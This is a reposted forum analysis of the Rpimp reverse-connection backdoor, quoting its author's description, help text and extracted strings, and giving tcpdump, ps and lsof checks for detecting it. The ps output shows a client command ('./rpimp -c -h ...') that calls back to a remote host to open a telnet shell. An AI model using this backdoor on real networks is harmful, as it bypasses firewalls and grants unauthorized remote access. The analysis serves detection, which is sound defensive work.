[转载]Rpimp Backdoor Analysis
文章作者:Daniel B. CidRpimp is an interesting backdoor. Its allows the attacker to bypass
the firewall protection, using some permitted port.
Defition by the author (of rpimp):
Reverse Pimpage was designed to allow you to access a box that is behind a
firewall from outside that firewall itself. The way it accomplishes this is
by having the "client", the box behind the firewall, send in certain intervals
a SYN request to a certain port. The reason it does it in intervals is so that
some routers dont freak out that they're getting a continous stream of SYN
requests, and for efficiency. Once you get home for the day you simply run the
"server" on your home PC and when the time interval is up it will connect.
Once it's connected the "client" telnets to itself and routes data back and
forth between the two. It's rather efficient and the security is there.
---------- END
Usage:
root@rootkit:/test/exploits/rp# ./rpimp --help
./rpimp: invalid option -- -
Usage: ./rpimp [-s] [-c] -h host [-v] [-p port] [-t timeout] [-e expectstr]
[-g gateway] [-P protocol]
[-E escapechar]
---------- END
Strings (interesting parts):
/lib/ld-linux.so.2
libnsl.so.1
connect
bind
inet_addr
stdin
strstr
signal
read
listen
fork
getopt
memset
cfmakeraw
tcgetattr
gethostbyname
stderr
fwrite
exit
Connection established.
Escape character is '%c%c'
-g optional gateway
-v version option.
127.0.0.1
Exiting...
Client suggested, but host not given.
Successfully forked into pid %i
ERROR: unable to fork, continueing...
FATAL: Neither server or client defined, exiting.
Reverse Pimpage v2.1 by: Matt Miller ([email]warped@hick.org[/email])
Bug fixes and Term Emul. by Tommy ([email]dantar@dantar.com[/email])
Usage: %s [-s] [-c] -h host [-v] [-p port] [-t timeout] [-e expectstr]
[-g gateway] [-P protocol]
[-E escapechar]
-s Server option, -h not needed.
-c Client option, host needed.
-t timeout for client to reconnect.
-e expect string to expect from gateway (will send remotehost)
-P protocol to use, either telnet or none.
Unable to resolve %s
telnet
127.0.0.1
---------- END
Ways to detect
1- See with tcpdump if you have any program trying to connect to a remote
machine on port 1040 (this port can change, but this one is the default).
tcpdump -i eth0 tcp port 1040
--
13:26:47.490302 192.168.1.107.32781 > 192.168.1.106.1040: S 3771526166:3771526166(0) win 5840 <mss 1460,sackOK,timestamp 647210 0,nop,wscale 0> (DF)
13:26:47.491062 192.168.1.106.1040 > 192.168.1.107.32781: R 0:0(0) ack 3771526167 win 0 (DF)
2- Verify if you have any program rpimp running.
ps -aux | grep rpimp
root 2493 0.0 0.1 1420 308 tty1 S 13:25 0:00 ./rpimp -c -h 192168.1.106
3- Using lsof, look for some entries similar to that one:
rpimp 2493 root mem REG 3,3 672140 194066 /lib/ld-2.3.1.so
rpimp 2493 root mem REG 3,3 87653 194048 /lib/libnsl-2.3.1.so
rpimp 2493 root mem REG 3,3 1435624 194045 /lib/libc-2.3.1.so
rpimp 2493 root 0u CHR 4,1 64399 /dev/tty1
rpimp 2493 root 1u CHR 4,1 64399 /dev/tty1
rpimp 2493 root 2u CHR 4,1 64399 /dev/tty1
rpimp 2493 root 3u sock 0,0 14410 can't identify protocol
rpimp 2493 root 4u sock 0,0 14604 can't identify protocol
rpimp 2493 root 5u sock 0,0 14610 can't identify protocol
rpimp 2493 root 6u sock 0,0 14611 can't identify protocol
rpimp 2493 root 3u sock 0,0 14410 can't identify protocol
---------- END
页:
[1]